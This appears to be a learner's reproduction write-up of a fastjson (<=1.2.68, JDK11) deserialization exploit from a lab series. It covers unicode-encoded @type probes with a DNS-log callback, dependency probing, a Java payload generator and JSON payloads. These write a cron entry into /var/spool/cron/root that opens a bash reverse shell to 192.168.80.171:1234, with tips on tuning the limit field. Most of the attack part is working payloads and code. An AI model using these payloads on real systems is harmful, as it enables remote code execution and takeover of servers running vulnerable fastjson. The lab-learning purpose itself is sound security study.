Reference: https://github.com/lemono0/FastJsonPart
The main focus is on reproducing a process to understand the vulnerability exploitation flow. There are many excellent articles written by experts online, but they are not sufficient for foundational learning (especially regarding compiling Java files with IDEA, how to resolve dependency issues, etc. -__-|). Therefore, I will document my own reproduction process.
07-1268-jkd11-writefile#
Capture packets, remove parentheses, and determine the version of fastjson.
DNS log probing fastjson, found to be filtered.
Encode @type in unicode.
{
"\u0040\u0074\u0079\u0070\u0065": "java.net.InetSocketAddress" {
"address": ,
"val": "1bdmkeljntnmdy5h5nf3h571tszjn9by.oastify.com"
}
}
Received DNS log request.
Probe version.
{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.AutoCloseable"
Probe dependencies.
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "java.net.http.HttpClient"
}
}
Returning can not cast to char
indicates the presence of java.net.http.HttpClient
, which is JDK11.
org.springframework.web.bind.annotation.RequestMapping
is a class specific to SpringBoot, so the target environment is a SpringBoot environment.
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
Having confirmed the use of JDK11, unrestricted file writing can be performed. A scheduled task is used to reverse shell.
Generate exp file, jdk11.java.
import com.alibaba.fastjson.JSON;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.Arrays;
import java.util.Base64;
import java.util.zip.Deflater;
public class jdk11 {
public static String gzcompress(String code) {
byte[] data = code.getBytes();
byte[] output = new byte[0];
Deflater compresser = new Deflater();
compresser.reset();
compresser.setInput(data);
compresser.finish();
ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
try {
byte[] buf = new byte[1024];
while (!compresser.finished()) {
int i = compresser.deflate(buf);
bos.write(buf, 0, i);
}
output = bos.toByteArray();
} catch (Exception e) {
output = data;
e.printStackTrace();
} finally {
try {
bos.close();
} catch (IOException e) {
e.printStackTrace();
}
}
compresser.end();
System.out.println(Arrays.toString(output));
return Base64.getEncoder().encodeToString(output);
}
public static void main(String[] args) throws Exception {
String code = gzcompress("* * * * * bash -i >& /dev/tcp/192.168.80.171/1234 0>&1 \n");
//<=1.2.68 and JDK11
String payload = "{\r\n"
+ " \"@type\":\"java.lang.AutoCloseable\",\r\n"
+ " \"@type\":\"sun.rmi.server.MarshalOutputStream\",\r\n"
+ " \"out\":\r\n"
+ " {\r\n"
+ " \"@type\":\"java.util.zip.InflaterOutputStream\",\r\n"
+ " \"out\":\r\n"
+ " {\r\n"
+ " \"@type\":\"java.io.FileOutputStream\",\r\n"
+ " \"file\":\"/var/spool/cron/root\",\r\n"
+ " \"append\":false\r\n"
+ " },\r\n"
+ " \"infl\":\r\n"
+ " {\r\n"
+ " \"input\":\r\n"
+ " {\r\n"
+ " \"array\":\"" + code + "\",\r\n"
+ " \"limit\":1999\r\n"
+ " }\r\n"
+ " },\r\n"
+ " \"bufLen\":1048576\r\n"
+ " },\r\n"
+ " \"protocolVersion\":1\r\n"
+ "}\r\n"
+ "";
System.out.println(payload);
JSON.parseObject(payload);
}
}
Generate payload.
Note:
When writing a scheduled task, there are several points to pay attention to:
-
The Linux system itself has limitations; first, CentOS and Ubuntu series are different, and the file writing location and command methods vary. Here, because it is a CentOS system, it writes to the
/var/spool/cron/root
file, while on an Ubuntu system, it should be written to the/etc/crontab
system-level scheduled tasks, not to the/var/spool/cron/crontabs/root
file, as this would involve permission changes and restarting the scheduled task service. -
When writing a scheduled task through this file writing vulnerability, it is necessary to add a newline operation at the end of the command to ensure that the command is a complete line; otherwise, it will not successfully reverse shell.
{
"\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
"\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
"file":"/var/spool/cron/root",
"append":false
},
"infl":
{
"input":
{
"array":"eJzTUtCCQoWkxOIMBd1MBTs1Bf2U1DL9kuQCfUNLIz1DMws9CwM9Q3NDfUMjYxMFAzs1QwUuAHKnDGw=",
"limit":1999
}
},
"bufLen":1048576
},
"protocolVersion":1
}
The length of the real data written to the file needs to be written at the limit. This length may not match the length of the command written to the scheduled task due to some processing. Here, the method is also to utilize the error message; first, set the limit value as large as possible, and fastjson will throw the correct data offset due to the incorrect offset position, which is 59 here, so 59 is the actual data length.
{
"\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
"\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
"file":"/var/spool/cron/root",
"append":false
},
"infl":
{
"input":
{
"array":"H4sIAAAAAAAAANNS0IJChaTE4gwF3UwFOzUF/ZTUMv2S5AJ9Q0sjPUMzCz0LAz1Dc0N9QyNjEwUDOzVDBS4AGWjIeTkAAAA=",
"limit":59
}
},
"bufLen":1048576
},
"protocolVersion":1
}
Reverse shell will be triggered.